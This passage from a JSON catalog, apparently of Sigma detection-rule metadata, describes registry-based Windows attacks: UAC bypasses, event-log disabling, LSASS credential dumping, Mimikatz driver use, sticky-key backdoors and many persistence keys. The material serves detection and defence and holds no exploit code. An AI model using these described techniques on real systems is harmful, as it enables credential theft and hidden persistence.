"https://wikileaks.org/vault7/#Pandemic", - "https://twitter.com/MalwareJake/status/870349480356454401", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ] - }, - "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "value": "Pandemic Registry Key" - }, - { - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", - "meta": { - "author": "oscd.community, Dmitry Uchakin", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_bypass_via_wsreset.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "value": "UAC Bypass Via Wsreset" - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "meta": { - "author": "Nik Seetharaman", - "creation_date": "2018/07/16", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "filename": "registry_event_cmstp_execution_by_registry.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ] - }, - "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "value": "CMSTP Execution Registry Event" - }, - { - "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1182516740955226112", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ] - }, - "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "value": "Disable Security Events Logging Adding Reg Key MiniNt" - }, - { - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/08/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_disable_wdigest_credential_guard.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "value": "Wdigest CredGuard Registry Modification" - }, - { - "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", - "value": "Esentutl Volume Shadow Copy Service Keys" - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/31", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_hack_wce_reg.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ] - }, - "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "value": "Windows Credential Editor Registry" - }, - { - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Unknown" 
- ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1608" - ] - }, - "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", - "value": "HybridConnectionManager Service Installation - Registry" - }, - { - "description": "Detects the presence of a registry key created during Azorult execution", - "meta": { - "author": "Trent Liffick", - "creation_date": "2020/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_mal_azorult.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ] - }, - "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "value": "Registry Entries For Azorult Malware" - }, - { - "description": "Detects FlowCloud malware from threat group TA410.", - "meta": { - "author": "NVISO", - "creation_date": "2020/06/09", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_mal_flowcloud.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ] - }, - 
"uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "value": "FlowCloud Malware" - }, - { - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "meta": { - "author": "Markus Neis, @markus_neis, Florian Roth", - "creation_date": "2021/07/04", - "falsepositive": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" - ], - "filename": "registry_event_mimikatz_printernightmare.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", - "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" - ] - }, - "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "value": "PrinterNightmare Mimimkatz Driver Name" - }, - { - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "meta": { - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate modification of screensaver" - ], - "filename": "registry_event_modify_screensaver_binary_path.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.002" - ] - }, - "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "value": "Path To Screensaver Binary Modified" - }, - { - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "meta": { - "author": "Dmitriy Lifanov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_narrator_feedback_persistance.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "value": "Narrator's Feedback-Hub Persistence" - }, - { - "description": "Detects NetNTLM downgrade attack", - "meta": { - "author": "Florian Roth, wagga", - "creation_date": "2018/03/20", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_net_ntlm_downgrade.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ] - }, - "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "value": "NetNTLM Downgrade Attack - Registry" - }, - { - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to 
obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.009" - ] - }, - "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "value": "New DLL Added to AppCertDlls Registry Key" - }, - { - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "meta": { - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.010" - ] - }, - "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "value": "New DLL Added to AppInit_DLLs Registry Key" - }, - { - "description": "Detects the addition of office 
test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/25", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_office_test_regadd.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1137/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.002" - ] - }, - "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", - "value": "Office Application Startup - Office Test" - }, - { - "description": "Detects persistence registry keys for Recycle Bin", - "meta": { - "author": "frack113", - "creation_date": "2021/11/18", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_persistence_recycle_bin.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", - "https://persistence-info.github.io/Data/recyclebin.html", - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", - "value": "Registry Persistence Mechanisms in Recycle Bin" - }, - { - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. 
For command execution see rule win_netsh_port_fwd.yml.", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/06/22", - "falsepositive": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" - ], - "filename": "registry_event_portproxy_registry_key.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://adepts.of0x.cc/netsh-portproxy-code/", - "https://www.dfirnotes.net/portproxy_detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "value": "PortProxy Registry Key" - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "meta": { - "author": "Alexander Rausch", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_redmimicry_winnti_reg.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "value": "RedMimicry Winnti Playbook Registry Manipulation" - }, - { - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/30", - 
"falsepositive": [ - "Unknown" - ], - "filename": "registry_event_runkey_winekey.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "value": "WINEKEY Registry Modification" - }, - { - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/11/15", - "falsepositive": [ - "Legitimate modification of the registry key by legitimate program" - ], - "filename": "registry_event_runonce_persistence.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "value": "Run Once Task Configuration in Registry" - }, - { - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_shell_open_keys_manipulation.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", - "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ] - }, - "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "value": "Shell Open Registry Keys Manipulation" - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/26", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_silentprocessexit_lsass.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.007" - ] - }, - "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", - "value": "SilentProcessExit Monitor Registration for LSASS" - }, - { - "description": "Detects the addition of a SSP to the 
registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "meta": { - "author": "iwillkeepwatch", - "creation_date": "2019/01/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_ssp_added_lsa_config.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.005" - ] - }, - "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "value": "Security Support Provider (SSP) Added to LSA Configuration" - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "meta": { - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2018/03/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_stickykey_like_backdoor.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ] - }, - "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "value": "Sticky Key Like Backdoor Usage - Registry" - }, - { - "description": "Detects creation/modification of Assistive Technology applications and 
persistence with usage of 'at'", - "meta": { - "author": "Mateusz Wydra, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Creation of non-default, legitimate at usage" - ], - "filename": "registry_event_susp_atbroker_change.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", - "value": "Atbroker Registry Change" - }, - { - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/01", - "falsepositive": [ - "Software installers downloaded and used by users" - ], - "filename": "registry_event_susp_download_run_key.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "value": "Suspicious Run Key from Download" - }, - { - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/16", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_susp_lsass_dll_load.yml", - "level": "high", - "logsource.category": 
"registry_event", - "logsource.product": "windows", - "refs": [ - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", - "https://twitter.com/SBousseaden/status/1183745981189427200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" - ] - }, - "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "value": "DLL Load via LSASS" - }, - { - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "meta": { - "author": "Den Iuzvyk", - "creation_date": "2020/06/07", - "falsepositive": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" - ], - "filename": "registry_event_susp_mic_cam_access.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" - ] - }, - "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", - "value": "Suspicious Camera and Microphone Access" - }, - { - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "registry_event_trust_record_modification.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", - 
"http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", - "value": "Windows Registry Trust Record Modification" - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "meta": { - "author": "Sreeman", - "creation_date": "2020/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ] - }, - "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", - "value": "Abusing Windows Telemetry For Persistence - Registry" - }, - { - "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_add_hidden_user.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ] - }, - "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", - "value": "User Account Hidden By Registry" - }, - { - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_add_load_service_in_safe_mode.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "value": "Registry Persitence via Service in Safe Mode" - }, - { - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_add_port_monitor.yml", - "level": "high", - 
"logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ] - }, - "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "value": "Add Port Monitor Persistence in Registry" - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" - ], - "filename": "registry_set_aedebug_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/aedebug.html", - "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "092af964-4233-4373-b4ba-d86ea2890288", - "value": "Add Debugger Entry To AeDebug For Persistence" - }, - { - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "meta": { - 